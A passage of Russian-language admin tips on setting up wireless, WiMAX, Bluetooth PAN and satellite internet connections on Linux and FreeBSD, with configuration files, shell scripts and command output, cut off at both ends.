Extra: Last beacon: 104ms ago IE: Unknown: 00036E6574 IE: Unknown: 010C82848B8C12969824B048606C IE: Unknown: 03010A IE: Unknown: 0706555320010B1E IE: Unknown: 2A0100 IE: Unknown: 2F0100 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : PSK IE: Unknown: DD090010180200F0000000 Результаты сканирования показали наличие точки доступа под названием - ESSID:"myhome", работающей на канале - Channel:13, в режиме - Mode:Master, с включенным шифрованием - Encryption key:on, тип шифрования - IE: IEEE 802.11i/WPA2 Version 1. 10. Устанавливаем поддержку WPA/WPA2 шифрования поскольку наша точка доступа использует WPA2 apt-get install wpasupplicant 11. Конфигурируем wpasupplicant, Редактируем файл /etc/network/wpa-psk-tkip.conf # WPA-PSK/TKIP ctrl_interface=/var/run/wpa_supplicant network={ ssid="myhome" proto=WPA2 RSN key_mgmt=WPA-PSK pairwise=CCMP TKIP group=CCMP TKIP psk="пароль к точке доступа" } В моем случае конфиг выглядит именно таким образом, возможно у вас он будет отличаться если например будет отличаться метод шифрования, более подробно с опциями конфиг файла для wpasuplicant можно ознакомиться при помощи команды - man wpa_supplicant, гугла и админской интуиции. 12. Донастраиваем сетевое соединение, дописываем в конфиге /etc/network/interfaces новые строки: # The primary network interface #allow-hotplug eth0 #auto eth0 #iface eth0 inet dhcp #my Wi-fi connection auto wlan0 iface wlan0 inet dhcp wireless-channel 10 wireless-mode Master #WPA-TKIP wpa-conf /etc/network/wpa-psk-tkip.conf Как видно, я специально закомментировал знаком # eth0 интерфейс через который был подключен интернет, так как после рестарта сетевых соединений хочу чтобы интернет соединялся только через wlan0 интерфейс. Затем можно отключить eth0 интерфес командой "ifconfig eth0 down". 13. Перезагружаем сетевые соединения командой /etc/init.d/networking restart # /etc/init.d/networking restart Running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces ... (warning). Reconfiguring network interfaces...Ignoring unknown interface eth0=eth0. Internet Systems Consortium DHCP Client 4.1.1-P1 Listening on LPF/wlan0/00:00:00:00:00:00 Sending on LPF/wlan0/00:00:00:00:00:00 Sending on Socket/fallback DHCPRELEASE on wlan0 to 192.168.13.1 port 67 Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Invalid argument. Internet Systems Consortium DHCP Client 4.1.1-P1 Listening on LPF/wlan0/00:00:00:00:00:00 Sending on LPF/wlan0/00:00:00:00:00:00 Sending on Socket/fallback DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 4 DHCPOFFER from 192.168.13.1 DHCPREQUEST on wlan0 to 255.255.255.255 port 67 DHCPACK from 192.168.13.1 bound to 192.168.13.13 -- renewal in 37509 seconds. done. 14. Проверим что все работает Посмотрим список поднятых интерфейсов: #ifconfig lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:76 errors:0 dropped:0 overruns:0 frame:0 TX packets:76 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:5802 (5.6 KiB) TX bytes:5802 (5.6 KiB) wlan0 Link encap:Ethernet HWaddr 00:00:00:00:00:00 inet addr:192.168.13.13 Bcast:192.168.13.255 Mask:255.255.255.0 inet6 addr: fe80::21f:e1ff:fe25:4fd4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:5 errors:0 dropped:0 overruns:0 frame:0 TX packets:11 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1036 (1.0 KiB) TX bytes:1640 (1.6 KiB) Видим поднятые внутренний системный интерфейс Loopback, и наш wifi wlan0 интерфейс, теперь проверим работает ли интернет # ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_req=1 ttl=54 time=69.8 ms 64 bytes from 8.8.8.8: icmp_req=2 ttl=54 time=69.6 ms 64 bytes from 8.8.8.8: icmp_req=3 ttl=54 time=69.5 ms 64 bytes from 8.8.8.8: icmp_req=4 ttl=54 time=69.5 ms 64 bytes from 8.8.8.8: icmp_req=5 ttl=54 time=69.6 ms Google пингуется отлично! Посмотрим таблицу маршрутизации системы: # ip r 192.168.13.0/24 dev wlan0 proto kernel scope link src 192.168.13.13 default via 192.168.13.1 dev wlan0 Понимаем что все работает. На этом я завершаю заметку о том как настраивать Wi-Fi в Linux. Надеюсь что данная информация будет Вам полезна, а поднять шифрованное wifi соединение при помощи родных драйверов Linux теперь не для кого не составит большого труда. Присылайте Ваши вопросы, дополнения, исправления к данному руководству на мой e-mail: alex.golovin@mail.ru, дополняйте комментариями к статье-совету ниже на сайте. Автор: Александр Головин. Полезные ссылки по теме: http://wiki.debian.org/Broadcom http://wiki.debian.org/bcm43xx http://wireless.kernel.org/en/users/Drivers/b43#Known_issues

Виртуальная точка доступа с раздачей от ADSL на базе маршрутизатора D-Link 2500u (доп. ссылка 1) Автор: sukanax [комментарии]

В этом примере в качестве маршрутизатора используется D-Link 2500u (перепрошитый 2300u). Необходимо чтобы dlink 2500u работал в режиме маршрутизатора. В качестве wifi-устройства использовался USB-адаптер tp-link wn721n. 1. Устанавливаем hostapd, dhcpd клиент, bridge-utils из консоли. После выполняем "sudo su" 2. Создаем файл /etc/hostapd/hostapd.conf interface=wlan0 bridge=br0 logger_stdout=-1 logger_stdout_level=2 ssid="Имя нашей точки доступа" hw_mode=g channel=6 auth_algs=3 max_num_sta=5 wpa=2 wpa_passphrase="пароль" wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP CCMP rsn_pairwise=CCMP 3. включаем ip форвардинг echo 1 > /proc/sys/net/ipv4/ip_forward 4. Создаем скрипт в любом месте нашего Linux. #!/bin/bash auto eth1 iface eth1 inet dhcp killall dhcpcd ifconfig eth0 down ifconfig wlan0 down brctl addbr br0 #Создает мост brctl addif br0 eth0 #Добавляет интерфейс eth0 к br0 мосту brctl setfd br0 0 #This sets the forwarding delay to 0 seconds hostapd -dd /etc/hostapd/hostapd.conf & iwconfig wlan0 brctl addif br0 wlan0 ifconfig eth0 up ifconfig br0 up dhcpcd br0 & exit 5. Запускаем этот скрипт и подключаем мобильное устройство по wifi к интернету. Возможно придется выключить network-manager перед запуском. Скрипт создает сетевой мост eth0 и wlan0. eth1 у меня остался для работы интернета на главном компьютере.

Настройка подключения к Comstar через USB WiMAX модем 2501 в Linux Автор: desenix [комментарии]

Предисловие Когда-то давно купил себе данный модем (на чипсете Beceem BCS200) с тарифом без абонентской платы, в качестве резервного канала, с тех пор пользовался от случая к случаю, тем более тариф тому способствовал. А тут недавно мой проводной провайдер отвалился на целый день и решил проверить, а не появилось ли решения под Linux? Одно дело компьютер с WiMax, а другое дело домашний роутер обеспечивающий несколько компьютеров интернетом. Что интересно в сети уже с 2010 года лежат готовые решения но для других провайдеров, а для Комстар-а нет, либо не нашёл. Да и сам провайдер не заботиться о Linux пользователях. Попадались решения и для других модемов, но как-то не возникло желания покупать ещё один, когда этот достался по акции. Введение На одно из решений наткнулся здесь. Там кто-то в комментариях очень похожий конфиг для другого провайдера выложил. Информацию по настройке параметров для Комстар частично взял отсюда. Если кто-то знает где лежат параметры сети для Yota, сообщите, размещу ссылку. Там же можно по ссылке скачать необходимый сертификат (ca1.cer), либо вытащить его из Comstar Connection Manager (далее CCM), но об этом ниже. Подготовка Нам понадобится: 1. Компьютер с Linux, у меня был c Fedora 15 (x86), пробовал модули собирать и на x86_64. 2. Как советует автор одного из решений, нужно установить пакеты linux-source linux-headers openssl unzip dos2unix patch gcc. Возможно у вас они будут называться немного иначе (у меня первые два такие kernel-debug kernel-headers), и это возможно не полный список.\ 3. Самое главное Sprint 4G Depelopment Pack, по данной ссылке всегда последняя версия, где взять предыдущие не знаю. Кстати, этот пакет, позволяет экспериментировать и под Windows, а затем можно немного отредактировав, перенести настройки в Linux, что я и сделал, так как не было уверенности в правильной работе драйверов под Linux. Модуль ядра, судя по коду, должен поддерживать VID=0x198F PID=0x0300, 0x0210, 0x0220, 0x15E, 0x015F, 0x0160. Под Lunix для своего модема VID и PID можно посмотреть командой lsusb, предварительно вставив его в USB. Скачиваем Sprint 4G Depelopment Pack, распаковываем его в любой каталог. В корне каталога Sprint4GDeveloperPack-1.6.1.2.2 (у вас может оказаться уже другая версия), находим там файл install.sh и немного его поправим. Если не хотите потом вводить путь к исходникам ядра, это можно сделать до запуска инсталлятора, отредактировав соответствующую строчку в файле install.sh KERNEL_SOURCES=${5:-/usr/src/linux}; На случай если в директории /usr/src/kernels/ будет несколько версий исходников ядра, уточнить текущую версия ядра можно командой uname -r или например так, в данном случае, версия ядра, будет подставляться автоматически: KERNEL_SOURCES=${5:-/usr/src/kernels/`uname -r`}; Ещё изменил параметр POWER_SAVE на Off, это на ваш вкус, работало в обоих случаях. POWER_SAVE_On_Off=${12:-On} Установка Запускаем install.sh На вопрос о лицензии нажимаем "y", далее если вы отредактировали install.sh жмём Enter до вопроса о корректности настроек, там надо нажать "y", после чего начнётся копирование файлов и сборка пакета. Ждём результата либо ошибок. У меня если и возникали ошибки, только из-за нехватки того или иного пакета. После ошибки опять запускаем, после стандартной процедуры вопросов появиться ещё один, тут выбираем "A" затем Enter. После сборки, нужно проверить загрузку и работу модуля, вставьте модем в USB разъём, затем выполните: modprobe drxvi314 Теперь посмотрим появился ли у нас ещё один интерфейс ifconfig -a Если не помните какие у вас были интерфейсы, выгрузите модуль и сравните вывод rmmod drxvi314 ifconfig -a Запомните имя интерфейса, он понадобиться в файле конфигурации. Конфигурация Если модуль ядра загружается и работает, его можно вставить в "автозагрузку" в конец файла /etc/rc.d/rc.local, если такого нет, создайте. Понадобиться сертификат из CCM, если не хотите выковыривать, можно скачать но с другим именем здесь. Благодаря этой ссылке и были подобраны правильные параметры для конфига. В CCM надо найти файл ca1.cer и конвертировать его командой openssl x509 -inform DER -in ca1.cer -outform PEM -out ca1.pem положите его куда хотите, например чтоб директория зря не пропадала в /etc/Sprint4G/ca1.pem Туда же положим и конфиг /etc/Sprint4G/wimaxd.conf # Частотный план, не уверен что стоит писать сюда лишнее, # иначе модем в автоматическом режиме может долбиться к другому провайдеру. BandwidthMHz 10 CenterFrequencyMHz 2540 2550 2560 AuthEnabled Yes EAPMethod 0 UserIdentity 'ваш_логин@wimax.comstar-uts.ru' UserPassword 'ваш_пароль' ValidateServerCert Yes CACertPath '/etc/Sprint4G/' CACertFileName '/etc/Sprint4G/ca1.pem' TTLSAnonymousIdentity 'Anonymous@wimax.comstar-uts.ru' TLSDevicePrivateKeyPassword '' PrivateKeyPasswordFormat 'Ascii' AuthenticationTimeoutSec 10 InvertMSKByteOrder No AlwaysIncludeTLSLength No EAPFragmentMaxLength 1398 EAPPollingLoopIntervalMs 50 TLSDevicePrivateKeyPassword '' InnerNAIChange No NetworkSearchTimeoutSec 60 LPSearchInShutDownEnabled No NetworkEntryTimeoutSec 10 NEToHighestCINRBaseStation No BeceemEngineFileName '/usr/lib/libengine_beceem.so' AuthEthernetToRADIUS No # Автоподключение AutoReConnectEnabled Yes AutoReDisconnectEnabled No SkipNetSearch No AutoReConnectIntervalSec 1 AutoReDisconnectIntervalSec 20 LinkStatusRequestPeriodSec 2 # Скрипт выполняется после установки соединения IPRefreshCommand '/etc/Sprint4G/wimaxup.sh' # Можно заменить на такой вариант, естественно указав ваш интерфейс #IPRefreshCommand 'dhclient eth0' # Разрешает выполнять скрипт NetEntryIPRefreshEnabled Yes # Вроде должен убивать dhclient, у меня не работало TerminateDHCPClient No FirmwareFileName '/lib/firmware/macxvi350.bin' ConfigFileName '/lib/firmware/macxvi.cfg' # Управление логами #CSCMDebugLogLevel 4 CSCMDebugLogLevel 1 #AuthLogLevel 5 AuthLogLevel 1 AuthLogFileName '/tmp/CM_Auth.log' AuthLogFileMaxSizeMB 1 EngineLoggingEnabled Yes EngineLogFileMaxSizeMB 2 EngineLogFileName '/tmp/CM_Engine.log' Немного автоматизации не помешает, не забудьте заменить eth0 на свой интерфейс, который определили при тестировании модуля. /etc/Sprint4G/wimaxup.sh #!/bin/bash varif=eth0 res=`ifconfig $varif | grep -c "UP"` if [ ! "$res" == "0" ]; then ifdown $varif fi ifup $varif Проверка и использование Проверку лучше проводить в режиме полной отладки, для выявления ошибок CSCMDebugLogLevel 4 AuthLogLevel 5 Необходимо запустить демон в отладочном режиме и его клиент в разных консолях Демон (Сервер) wimaxd -D -c /etc/Sprint4G/wimaxd.conf консоль клиента, через неё будем управлять демоном (Сервером). wimaxc -i Набор возможных команд консоли можно узнать запросом help. В текущем конфиге, если есть сигнал, сразу начнётся попытка подключения, этого нам не надо, отредактируем секцию "Автоподключение". Так как автоподключение отключено, подключаться надо в ручном режиме: Сначала ищем базовые станции > search Если найдены несколько, подключаемся с наилучшим сигналом, или к единственной, например > connect 0 Для просмотра статуса соединения, нужно выполнять команды status, linkstats. Так команда status при установленном соединении содержит строчку "LINKUP ACHIEVED". IP адрес можно менять перезапрашивая, не разрывая соединение, и установка самого соединения не значит автоматического получения адреса, настройки маршрутов и др., этим должен заниматься dhclient. Для корректного выхода и выгрузки сервера надо сначала выключить модуль > shutdown Затем остановить и выгрузить сервер (демон) > server stop Если выгрузите сервер и не остановите работу модуля командой shutdown, соединение не будет разорвано и продолжит работать само по себе потребляя трафик. Для нормальной работы, отключим отладку в логах CSCMDebugLogLevel 1 AuthLogLevel 1 и запустим сервер в качестве демона wimaxd -c /etc/Sprint4G/wimaxd.conf Нормальных средств управления нет, хотя пишут что в сети гуляют какие-то скрипты. Но есть исходники клиента и сервера, при желании можно разобраться. Так сервер открывает порт 5200, если туда подключиться telnet-ом, можно увидеть текстовое приглашение, правда текстовые команды он от вас принимать не будет. Безопасность В отладочных логах сохраняются логин и пароль, поэтому не забывайте их удалять, а после экспериментов отключите отладочные логи. Не забывайте также что логин и пароль хранятся в открытом виде в файле конфигурации. Нюансы, Недостатки, Ошибки После обновления ядра, понадобиться пересобирать модуль. Модуль ядра иногда работает не стабильно, например на Fedora 14 приходиться его выгружать, вставлять устройство загружать или в ином порядке плясать с бубном, пару раз система зависала, хотя может проблема с железом. На версии Fedora 15, работает без замечаний. Если индикатор на модеме гаснет во время поиска сети, либо во время подключения, скорее всего ему не хватает питания, для исправления ситуации пришлось использовать USB-HUB с отдельным источником. Сам модем плохо ловит сеть в помещении, хотя раньше работал, видимо работа сети стала хуже, работает только у окна. Сервер (демон) иногда при завершении работы выдаёт ошибку и/или зависает, приходиться его "убивать". Иногда если не выгружен dhclient который запускал сервер (демон) для его интерфейса, то сервер (Beceem Connection Manager Server) может повторно не запуститься, ругаясь на занятый сокет, приходиться dhclient "убивать" вручную. После остановки сервера, остаётся "активным" интерфейс, его приходиться вручную деактивировать ifconfig eth0 down, хотя можно этого и не делать, если не мешает. Нет возможности или не нашёл, запуска скрипта при отключении, для деактивации интерфейса.

Настройка Intel Wireless WiFi Link 4965AGN во FreeBSD 8.0 Автор: Селин Павел [комментарии]

Имеется ноутбук Toshiba Satellite A200 с беспроводной картой на чипсете Intel 4965AGN. Установлена ОС FreeBSD 8-STABLE и имеется огромное желание завести WiFi. Определяем наличие карты: pciconf -lv видим none@pci...... и подпись "Intel Wireless WiFi Link 4965AGN......." Определяем драйвер для используемого Wifi путем поиска в системных руководствах: man -k 4965AGN iwn(4) Читаем руководство по найденному драйверу: man iwn Видим что данный софт, как раз таки обслуживает устройство 4965AGN, и для его включения необходимо либо включить в loader.conf строку if_iwn_load="YES", либо пересобрать ядро с device iwn device iwnfw Поддержка необходимых для работы wifi-карты устройств wlan, pci и firmware уже включена в ядро GENERIC. Пересобираем ядро или правим /boot/loader.conf, перезагружаем систему и видим появление нового устройства iwn0. Находим в man rc.conf в разделе ifconfig строчку: "One or more wlan(4) device must be created for each wireless device as of FreeBSD 8.0" т.е. использовать iwn0 на прямую в ifconfig нельзя, а нужно создать отдельные wifi-интерфейсы (ifconfig wlan0 create wlandev iwn0). В /etc/rc.conf добавим: vaps_iwn0="wlan0" # если нужно использовать VAP (virtual access point) wlans_iwn0="wlan0" и после перезагрузки видим полноценно функционирующий интерфейс wlan0: ifconfig wlan0 up scan Для настройки соединения правим /etc/wpa_supplicant.conf (man wpa_supplicant.conf) network={ ssid="идентификатор сети" psk="ключ доступа" } и запускаем /etc/rc.d/wpa_supplicant start wlan0 dhclient wlan0 Если все работает, добавляем в /etc/rc.conf: ifconfig_wlan0="WPA DHCP"

Изменение порядка настройки беспроводного соединения во FreeBSD 8 Автор: mvalery [комментарии]

В описании (http://www.freebsd.org/releases/8.0R/relnotes-detailed.html) релиза FreeBSD 8.0 сообщается об изменениях в организации поддержки беспроводных сетей. Дословно написано следующее: "Подсистема поддержки беспроводных сетей (net80211) в настоящий момент использует псевдо-интерфейс именуемый wlanN вместо использования напрямую имени драйвера - такого как em0." Это серьезное изменение, которое привело к тому, что у всех перешедших на FreeBSD 8.0, беспроводное соединение потеряло работоспособность. На эту проблему еще год назад указывалось в статье. Беспроводное соединение восстанавливается путем внесения минимальных изменений в конфигурационный файл /etc/rc.conf: Старый вариант (FreeBSD 7.2 и более ранние версии): ifconfig_ral0="DHCP ssid office1" Новый вариант (FreeBSD 8.0): wlans_ral0="wlan0" ifconfig_wlan0="DHCP ssid office1" То есть, если раньше все параметры моей WiFi карты Edimax EW-7128g были "привязаны" непосредственно к драйверу устройства ral0, то сейчас на базе драйвера устройства ral0 создается псевдо-интерфейс wlan0. В дальнейшем конфигурируется псевдо-интерфейс wlan0.

Решение проблем с WiFi в Ubuntu 9.10 (доп. ссылка 1) Автор: Князь [комментарии]

После обновления Ubuntu на ноутбуке (Dell Vostro A860) до версии 9.10 перестал работать Wifi при абсолютной тишине в логах. Модуль ath5k грузится без ошибки и правильно распознает чип от Atheros. А Network Manager скупо пишет "Устройство не готово". После продолжительного гугления выяснилось, что все дело в некорректной работе функциональной кнопки (Fn + F11), отвечающей за включение/отключение Wifi и Bluetooth: $ tail /sys/class/rfkill/*/{state,name,type,persistent} ==> /sys/class/rfkill/rfkill1/state <== 0 ==> /sys/class/rfkill/rfkill2/state <== 0 ==> /sys/class/rfkill/rfkill3/state <== 0 ==> /sys/class/rfkill/rfkill1/name <== phy0 ==> /sys/class/rfkill/rfkill2/name <== dell-wifi ==> /sys/class/rfkill/rfkill3/name <== dell-bluetooth ==> /sys/class/rfkill/rfkill1/type <== wlan ==> /sys/class/rfkill/rfkill2/type <== wlan ==> /sys/class/rfkill/rfkill3/type <== bluetooth ==> /sys/class/rfkill/rfkill1/persistent <== 0 ==> /sys/class/rfkill/rfkill2/persistent <== 0 ==> /sys/class/rfkill/rfkill3/persistent <== 0 Как видим, rfkill1 и rfkill2 имеют тип wlan. Состояние (state) у обоих равно 0, означающему SOFT LOCK. Кроме состояния 0 могут быть 1 и 2, UNLOCK и HARD LOCK соответственно. Вся проблема состоит в том, что при нажатии на упомянутую ранее функциональную кнопку состояние переключается только между значениями SOFT LOCK и HARD LOCK, минуя UNLOCK. Из-за этого блокируется переход интерфейса Wifi в активный режим, наглядно демонстрируемый командой $ sudo ifconfig wlan0 up SIOCSIFFLAGS: Unknown error 132 Решение состоит в принудительном переводе в состояние UNLOCK. Для этого пишем простой скрипт #!/bin/sh for i in /sys/class/rfkill/rfkill*/type; do type="`cat $i`" if [ "$type" = "wlan" ]; then n="`echo $i | sed -r 's%/type$%%'`"; echo 1 > ${n}/state; fi; done; Сохраняем скрипт в файл "/usr/local/sbin/unlock-wlan" и делаем его исполняемым $ sudo chmod +x /usr/local/sbin/unlock-wlan После ручного запуска скрипта надо перезапускать Network Manager - иначе он ничего не заметит. Теперь настраиваем Upstart для исполнения нашего скрипта при загрузке системы, перед стартом Network Manager. Для этого создаем файл "/etc/init/unlock-wlan.conf" # unlock-wlan - unlock wireless device # description "unlock wireless device" # Скрипт запускается перед настройкой сетевых интерфейсов start on starting networking task exec /usr/local/sbin/unlock-wlan

Настройка WiMAX соединения в Linux, с картой Intel PRO WiFi/WiMax 5150(5350) Автор: pavlinux [комментарии]

По причине не любви к торчащим изо всех щелей USB-свисткам, была выбрана PCI карта Intel 5150, или аналогичная ей, - 5350, полностью схожи, кроме количества подключаемых антен, в 5350 из 3 штуки, заявленая скорость в 450Мб/сек., и пр. вкусности. 1. Настройка ядра. Начиная с версии 2.6.26, драйвер поддерживающий сию карту находится в основной ветке ядра. а. Поддержка стека WiMax: Networking support --> <M> WiMAX Wireless Broadband support б. Для подержки карты на PCI шине, необходимо включить следующие: Device Drivers <M> MMC/SD/SDIO card support ---> Внтури раздела MMC ничего включать ненадо, кроме поддержки отладочной информации, если конечно Вам нужно. с. Выбор драйвера - PCI (он же SDIO) и/или USB: Device Drivers --> [*] Network device support ---> WiMAX Wireless Broadband devices ---> <M> Intel Wireless WiMAX Connection 2400 over USB (including 5x50) <M> Intel Wireless WiMAX Connection 2400 over SDIO (8) WiMAX i2400m debug level Для более раних версий ядер, но не ранее 2.6.23 драйвера находятся на сайте http://linuxwimax.org/Download Процесс компиляции и установки описан во включённых README. # make && make modules_install && make install && update-initramfs -u; 2. Установка Firmware. Необходимо скопировать последнюю версию firmware с вышеуказаного сайта. Поместить в каталог с остальными firmware, в основных дистрибутивах это каталог /lib/firmware/ Далее нужно переименовать скаченный файл в соответстующий типу вашего устройства: i2400-fw-usb-1.4.sbcf - для USB устройства или i2400-fw-sdio-1.4.sbcf - для PCIe карты. Проверить какую именно firmware требует установленый драйве, можно командой: # modinfo i2400m-usb || modinfo i2400m-sdio 3. Установка Порльзовательских приложений. 3.1 Intel WiMAX Tools. # cd /usr/src # git clone git://git.kernel.org/pub/scm/linux/kernel/git/inaky/wimax-tools.git # cd wimax-tools/ # sh bootstrap # ./configure --build i386 \ --with-i2400m=/usr/src/linux \ --sysconfdir=/etc \ --localstatedir=/var; # make install; 3.2 Intel WiMAX Network Service. # wget "http://linuxwimax.org/Download?action=AttachFile&do=get&target=WiMAX-Network-Service-1.4.0.tar.bz2" # tar -xf WiMAX-Network-Service-1.4.0.tar.bz2 # cd WiMAX-Network-Service-1.4.0 # sh bootstrap # ./configure --build i386 \ --with-i2400m=/usr/src/linux \ --sysconfdir=/etc; # make install 3.3 WiMAX Binary Supplicant. # wget "http://linuxwimax.org/Download?action=AttachFile&do=get&target=Intel-WiMAX-Binary-Supplicant-1.4.0.tar.bz2" # tar -xf Intel-WiMAX-Binary-Supplicant-1.4.0 # cd Intel-WiMAX-Binary-Supplicant-1.4.0 # ./install_supplicant.sh install 4. Запуск WiMax демона. # rm /var/run/wimaxd.pid # /etc/init.d/wimax start 5. Соединение. # wimaxcu status # wimaxcu ron # wimaxcu scan # wimaxcu connect network 4 # dhclient wmx0 # wimaxcu status link # wimaxcu status connect 6. Подробное описание man wimaxcu. 7. Дополнительная информация. * http://linuxwimax.org/FAQ * http://ru.wikipedia.org/wiki/WiMAX * http://www.intel.com/network/connectivity/products/wireless/wimax/wifi/index.htm * http://www.yotatester.ru/obzor-podklyuchenie-i-test-skorosti-intel-wifiwimax-51505350-modemov/ * http://lists.linuxwimax.org/pipermail/wimax/

Установка PAN-соединения через bluetooth во FreeBSD 7.2 Автор: shurik [комментарии]

Рассказ об организации выхода ноутбутка в сеть через комуникатор Toshiba Portege G810 с Windows Mobile 6.1 на борту, не позволяющий использовать его в качестве gprs-модема, но позволяющий организовать соединение с ПК через bluetooth PAN. В состав FreeBSD 7.2 был включен демон btpand с реализацией поддержки профилей Bluetooth Network Access Point (NAP), Group Ad-hoc Network (GN) и Personal Area Network User (PANU). Связывание комуникатора с ноутбуком через bluetooth я описывать не буду - это хорошо изложено в хендбуке (http://www.freebsd.org/doc/ru/books/handbook/network-bluetooth.html). Для использования btpand нам необходимо знать BD_ADDR не только коммуникатора, но и локального ПК. Узнать его можно так: # hccontrol Read_BD_ADDR BD_ADDR: 00:1a:6b:df:1b:c9 Для удобства добавим BD_ADDR комуниактора и ПК в /etc/bluetooth/hosts: 00:1a:6b:df:1b:c9 hp6710s 00:1b:24:a8:9c:76 g810 Далее все как описано в man 8 btpand: # ifconfig tap0 create # btpand -a g810 -d hp6710s -s NAP -i tap0 btpand[1986]: Searching for NAP service at 00:1b:24:a8:9c:76 btpand[1986]: Found PSM 15 for service NAP btpand[1986]: Opening connection to service 0x1116 at 00:1b:24:a8:9c:76 btpand[1986]: channel_open: (fd#4) btpand[1986]: Using interface tap0 with addr 00:00:6b:df:1b:c9 btpand[1986]: channel_open: (fd#5) # dhclient tap0 DHCPDISCOVER on tap0 to 255.255.255.255 port 67 interval 5 DHCPOFFER from 192.168.0.1 DHCPREQUEST on tap0 to 255.255.255.255 port 67 DHCPACK from 192.168.0.1 bound to 192.168.0.238 -- renewal in 129600 seconds. Все можем работать:)

Настройка спутникового интернета через Skystar3 в Ubuntu Linux (доп. ссылка 1) Автор: Князь [комментарии]

Описывается настройка спутникового интернета провайдера "Радуга Интернет" через OpenVPN. После установки спутниковой карты в свободный слот PCI и загрузки ОС создаем файл "/etc/modprobe.d/dvb_core.modprobe" options dvb_core dvb_shutdown_timeout=915360000 Этим мы препятствуем "засыпанию" карты. В новых ядрах, в отличие от старых, установка параметра "dvb_shutdown_timeout" в 0 не помогает и потому надо выставлять заведомо большое значение таймаута (в секундах). Перезагружаем компьютер. Устанавливаем требуемые утилиты $ sudo aptitude install dvb-utils Создаем файл /etc/channels.conf Raduga:11671:v:0:18200:0:0:0 Здесь: Raduga - название канала. Может быть любым. 11671 - частота v - поляризация. Может быть H - горизонтальная и V - вертикальная 0 - FEC: 0 - Авто, 3 - 3/4,... 18200 - Величина потока (Symbol rate) 0 - Видео PID 0 - Аудио PID 0 - Program id Пробуем залочиться на сигнал $ szap -c /etc/channels.conf -x -n 1 reading channels from file '/etc/channels.conf' zapping to 1 'Raduga': sat 0, frequency = 11671 MHz V, symbolrate 18200000, vpid = 0, apid = 0 using '/dev/dvb/adapter0/frontend0' and '/dev/dvb/adapter0/demux0' status 07 | signal 9797 | snr 3270 | ber 0000ff00 | unc 00000000 | status 1f | signal 9696 | snr d344 | ber 00001800 | unc 00000000 | FE_HAS_LOCK Ключевые значения: "status 1f" и "FE_HAS_LOCK". Остальные поля указывают уровень сигнала, количество ошибок и т.п. Когда устойчивый сигнал будет получен, szap завершит свою работу. Теперь отключим rp_filter, фильтрующий пакеты которые не могут уйти через тот же интерфейс что и пришли. В нашем случае пакет приходит через один интерфейс, а уходит через другой $ sudo sh -c 'echo 0 > /proc/sys/net/ipv4/conf/dvb0_0/rp_filter' Создаем сетевой интерфейс спутниковой карты $ sudo dvbnet -p 1234 где "1234" - ваш PID. После выполнения команды должен появиться сетевой интерфейс "dvb0_0" (неактивный). Настраиваем интерфейс $ sudo ifconfig dvb0_0 hw ether YOUR-MAC-ADDRESS YOUR-IP-ADDRESS netmask 255.255.255.0 up где YOUR-MAC-ADDRESS и YOUR-IP-ADDRESS соответственно MAC-адрес и IP-адрес вашей подписки. Смотрим на наличие входящего трафика на интерфейсе dvb0_0 $ sudo dvbtraffic -PID--FREQ-----BANDWIDTH-BANDWIDTH- 0000 10 p/s 1 kb/s 15 kbit 0010 0 p/s 0 kb/s 1 kbit 0011 0 p/s 0 kb/s 1 kbit 0014 0 p/s 0 kb/s 1 kbit 0032 60 p/s 11 kb/s 90 kbit 003c 10 p/s 1 kb/s 15 kbit 003d 31 p/s 5 kb/s 47 kbit 0064 13 p/s 2 kb/s 20 kbit Если программа ничего не выводит, то проблемы могут быть в неправильных параметрах или "заснула" спутниковая карта. Правим конфигурационный файл /etc/network/interfaces и добавляем auto dvb0_0 iface dvb0_0 inet manual pre-up sh -c '/usr/bin/dvbnet -a 0 -p 1234 > /dev/null' up ifconfig $IFACE hw ether YOUR-MAC-ADDRESS YOUR-IP-ADDRESS netmask 255.255.255.0 up up sh -c 'echo 0 > /proc/sys/net/ipv4/conf/dvb0_0/rp_filter' up sh -c '/usr/bin/szap -c /etc/channels.conf -n 1 -x' down ifconfig $IFACE down down /usr/bin/dvbnet -d 0 Теперь приступим к установке и настройке openvpn Установим openvpn $ sudo aptitude install openvpn Скачаем из личного кабинета архив с ключами для openvpn. Из архива распакуем файлы ca.crt, client.ovpn, i0xxxxxx.csr, i0xxxxxx.crt, i0xxxxxx.key. Скопируем все эти файлы в директорию /etc/openvpn Сменим права доступа к файлу i0xxxxxx.key $ sudo chmod 0400 /etc/openvpn/i0xxxxxx.key Переименуем файл client.ovpn в raduga.conf и отредактируем его. В итоге должно получиться примерно такое содержание client dev tap # dev-node Raduga proto udp remote 80.81.208.66 55032 resolv-retry infinite nobind persist-key persist-tun ca /etc/openvpn/ca.crt cert /etc/openvpn/i0xxxxxx.crt key /etc/openvpn/i0xxxxxx.key ns-cert-type server verb 3 comp-lzo comp-noadapt auth-user-pass /etc/openvpn/password.txt route-up /etc/openvpn/tap0-route.sh Создаем файл /etc/openvpn/password.txt с именем и паролем подписки user password и делаем его доступным на чтение только владельцу $ sudo chmod 0400 /etc/openvpn/password.txt Создаем скрипт /etc/openvpn/tap0-route.sh, выполняемый после поднятия роутов. netstat -rn | \ sed '1,2d' | \ awk '{ \ if ($1 == "0.0.0.0" && $2 == "10.251.32.1" && $3 == "0.0.0.0" && $8 != "tap0") { \ EX=sprintf("/sbin/route del -net 0.0.0.0/0 gw %s dev %s && /sbin/route add -net 0.0.0.0/0 gw %s dev tap0\n", \ $2, $8, $2); system(EX); } }' В моем случае openvpn дефолтовый маршрут постоянно вешал на интерфейс dvb0_0 и пришлось прибегнуть к принудительной привязке скриптом роута к tap0. Делаем скрипт исполняемым $ sudo chmod +x /etc/openvpn/tap0-route.sh Редактируем файл /etc/default/openvpn и добавляем строку AUTOSTART="raduga" Пробуем 